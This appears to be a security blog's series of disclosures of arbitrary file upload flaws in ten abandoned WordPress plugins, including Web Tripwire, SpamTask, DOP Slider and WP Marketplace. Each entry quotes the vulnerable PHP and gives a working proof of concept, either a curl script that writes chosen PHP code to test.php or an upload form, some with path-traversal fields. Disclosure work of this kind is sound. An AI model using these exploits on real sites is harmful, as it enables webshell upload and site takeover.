13 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in Web Tripwire

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor hacking attempts on our websites. Through that we recently came across a request for a file, /web-tripwire/js/swfobject.js, from the plugin Web Tripwire. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /includes/ofc/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/web-tripwire/includes/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/web-tripwire/includes/ofc/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in SpamTask

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/spamtask/jquery.js, from the plugin SpamTask. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /chart/php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/spamtask/chart/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in WP Simple Cart

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/wp-simple-cart/js/json2.js, from the plugin WP Simple Cart. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

When a request to the file /request/simple-cart-upload.php includes a file then that file will be uploaded using the function move_uploaded_file() and will be placed in the directory specified by the variable $uploadfile:

24
25
26
27
28
29
30
31
32
33
34
35
36
37
$user_dir = SimpleCartFunctions::TemporaryDir($_GET['prefix']);
 
if (isset($_GET['file'])) {
    $upload_file = explode('.', $_FILES['userfile']['name']);
    $file_name = $_GET['file'] . '.' . $upload_file[count($upload_file)-1];
}
else {
    $file_name = $_FILES['userfile']['name'];
}
 
//ファイルアップロード
$uploaddir = $user_dir . '/';
$uploadfile = $uploaddir . basename($file_name);
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/wp-simple-cart/files/0/temporary/, if no files have been uploaded through the plugin before.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="userfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

 

30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in Seo Spy

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/js/swfobject.js, from the plugin Seo Spy. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /ofc/php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in PHP Analytics

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/php-analytics/tinymce/phpanalytics.js, from the plugin PHP Analytics. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /resources/open-flash-chart/php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/php-analytics/resources/open-flash-chart/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in social

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-networking-e-commerce-1/js/effects.js, from the plugin social. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability and seeing as other plugins that were also targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

In numerous files there is code that looks like it will take a file sent with a request to it and save it to the filesystem. We tested that out with the file /classes/views/social-options/form_cat_add.php to confirm the issue. That happens in the line that begins move_uploaded_file below, before there is nothing that limits who or what can be uploaded other than need to the provide a POST input “config_path” to indicates where WordPress’ configuration file is (which is usually stored in a standard location):

2
3
4
5
6
7
8
9
10
11
12
13
14
15
session_start();
$config_path = $_POST['config_path'];
require_once( $config_path . 'wp-config.php');
$pathinfo=$_POST['pathinfo'];
$pathinfo1=$pathinfo."/wp-admin/admin.php?page=social-category";
 
if((!empty($_FILES["image"])) &amp;&amp; ($_FILES['image']['error'] == 0))
{
$filename = basename($_FILES['image']['name']);
$path= dirname(__FILE__);
$path1=explode("classes",$path);
$path2=$path1[0].'images/uploads/';
$newname = $path2.$filename;
move_uploaded_file($_FILES["image"]["tmp_name"],$newname);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/social-networking-e-commerce-1/images/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="config_path" value="../../../../../../" />
<input type="file" name="image" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
26 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in ChikunCounter

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/chikuncount/swfobject.js, from the plugin ChikunCounter. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin it has a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /php-ofc-library/ofc_upload_image.php in this plugin. The file takes raw post data and saves it in a file with a name specified by the GET input “name”:

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/chikuncount/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/chikuncount/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
26 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in Developer Tools

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/developer-tools/js/developer-tools.js, from the plugin Developer Tools. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability and seeing as other plugins that were also targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

In the file /libs/swfupload/upload.php there is code that runs if several conditions are met, which will cause a file that is sent with a request to it to be saved to the filesystem:

136
137
138
139
140
141
142
if ( $upload_email_reporting == true AND $upload_directory_writable == true ) {
	if ( move_uploaded_file( $_FILES['Filedata']['tmp_name'] , $uploadfile ) ) {
	 //send_mail("SWFUpload File Saved: ".$_FILES["Filedata"]["name"],'Save Path: '.$uploadfile."\n\n".'$_FILES data: '."\n".print_r($_FILES,true)); 
	}else{
	 send_mail("SWFUpload File Not Saved: ".$_FILES["Filedata"]["name"],'Save Path: '.$uploadfile."\n\n".'$_FILES data: '."\n".print_r($_FILES,true)); 
	}
}

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/developer-tools/libs/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/developer-tools/libs/swfupload/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="UPLOADDIR" value="../" />
<input type="hidden" name="ADMINEMAIL" value="test@example.com" />
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
25 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in DOP Slider

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/dop-slider/libraries/js/jquery.uploadify.min.js, from the plugin DOP Slider. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

The name of the file requested seemed to refer to Uploadify, which is a library that was associated with a number of arbitrary file upload vulnerabilities in plugins a several years ago, due to software using it not properly restricting the uploads. When we did search for any existing reports of a vulnerability of that type in the DOP Slider or some other vulnerability, all we came up with was a page with a list of plugin files apparently relate to Uploadify.

Looking at the code in the file listed for this plugin, /libraries/php/uploadify.php, the issue can be seen:

24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
if (!empty($_FILES)){
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_GET['path'].'uploads';
 
    $ext = substr($_FILES['Filedata']['name'], strrpos($_FILES['Filedata']['name'], '.') + 1);
 
    $len = 64;
    $base='ABCDEFGHKLMNOPQRSTWXYZabcdefghjkmnpqrstwxyz123456789';
    $max=strlen($base)-1;
    $newName='';
    mt_srand((double)microtime()*1000000);
    while (strlen($newName)<$len+1){
        $newName.=$base{mt_rand(0,$max)};
    }
 
    $targetFile =  str_replace('//','/',$targetPath).'/'.$newName.'.'.$ext;
    move_uploaded_file($tempFile, $targetFile);

If a file has been included with a request to that file, then the code will generate a unique file name and place the file sent with the request in a directory that includes the word “uploads” and whatever additional value is included with the GET input “path”.

At the bottom of the file’s code the unique name of the saved file is echo’d:

75
echo $newName.'.'.$ext;

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/dop-slider/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/dop-slider/libraries/php/uploadify.php?path=../../" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
14 Oct

Arbitrary File Upload Vulnerability in WP Marketplace

When it comes to certain types of plugins you would hope that developers would be extra careful when it comes to security, one of them being eCommerce plugins for obvious reasons, but we have continued to see poor security practices with that type of plugin. Among the vulnerabilities we have found in them this year, have been two arbitrary file upload vulnerabilities, which is probably the most likely type of vulnerability to be exploited. As part of monitoring of hacker activity we have just spotted another one, this time it is one that is likely already being exploited.

Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.

Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case we quickly found one.

In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator):

148
149
150
151
152
153
154
155
156
if(is_admin())  {
    /*wp_enqueue_script('swfobject',plugins_url().'/wpmarketplace/uploadify/swfobject.js');
    wp_enqueue_script('uploadify',plugins_url().'/wpmarketplace/uploadify/jquery.uploadify.v2.1.4.min.js');
    wp_enqueue_style('uploadify',plugins_url().'/wpmarketplace/uploadify/uploadify.css');*/
 
    add_action("init","wpmp_upload_previews");
    add_action("wp_ajax_wpmp_delete_preview","wpmp_delete_preview");
    add_filter("wpmp_meta_box","wpmp_meta_box_images");
}

The wpmp_upload_previews() then will save an uploaded file to the file system without doing checks as to who is making the request, leading to an arbitrary file upload vulnerability:

108
109
110
111
112
113
114
115
116
117
118
function wpmp_upload_previews(){
     $adpdir = WPMP_IMAGE_DIR;
     if((isset($_GET['task'],$_FILES['Filedata']['tmp_name']) && is_uploaded_file($_FILES['Filedata']['tmp_name'])   && $_GET['task']=='wpmp_upload_previews')){
        $tempFile = $_FILES['Filedata']['tmp_name'];    
        $targetFile =  $adpdir ."wpdm-adp-". time().'-'.wpmp_format_name($_FILES['Filedata']['name']);
        move_uploaded_file($tempFile, $targetFile);
        echo basename($targetFile);        
        die();
     }
 
}

Development of the plugin stopped some time ago, so we are disclosing the vulnerability and notifying the Plugin Directory.

On the plugin’s page on wordpress.org, it is mentioned at the top that developers of this plugin are also the developers of the WordPress Download Manager plugin, for which we discovered an authenticated arbitrary file upload vulnerability nearly four months ago that still haven’t been fixed. So security doesn’t seem to be a priority for them in general.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/wpmp-previews/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php?task=wpmp_upload_previews" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/14/2016 – WordPress.org Plugin Directory notified.
  • 10/14/2016 – Plugin removed from WordPress.org Plugin Directory.